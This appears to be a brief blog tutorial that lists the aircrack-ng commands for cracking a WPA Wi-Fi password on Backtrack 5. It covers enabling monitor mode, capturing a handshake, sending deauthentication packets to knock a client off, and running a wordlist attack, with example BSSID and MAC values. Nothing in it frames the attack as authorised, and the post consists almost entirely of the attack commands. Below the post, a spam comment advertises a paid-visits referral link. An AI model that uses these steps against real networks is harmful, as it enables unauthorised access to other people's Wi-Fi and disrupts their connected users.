1.Before Starting The Tutorial Make Sure You have 3 Things.
2.Backtrack 5 r3
3.Wifi Device
4.A Good Word List.
( CLICK HERE TO DOWNLOAD GOOD WORDLIST )
Now Starting. Start Backtrack 5.
1. Fire up Terminal and type first Command
Airmon-ng
This Command Will show the interface.


2. Now type the 2nd CommandAirmon-ng start wlan0This Command will start the monitor mode on the interface

3. Now type the 3rd CommandAirodump-ng mon0This Command will Start Scanning All Wifi Networks

4. Now Type The forth CommandAirodump-ng -c ( channel ) -w ( file name to save captured packets ) –bssid (bssid of network) mon0This Command Will scan network until you get a handshake file
For example: airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0



5. Now Type the 5th commandAireplay-ng –deauth 64 -a (bssid) mon0This command will send deauth request. If the data is not generated you can increase request Numbers
aireplay-ng –deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0



6. Now Type The 6th command.NOTE: World-list should be in “/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/”Aircrack-ng (file name) -w( drag world-list file )

This command will crack the password.

Post a Comment

  1. join kro aur pesy kamao

    http://www.getpaid4visits.com/index.php?refcode=29279

    ReplyDelete

 
Top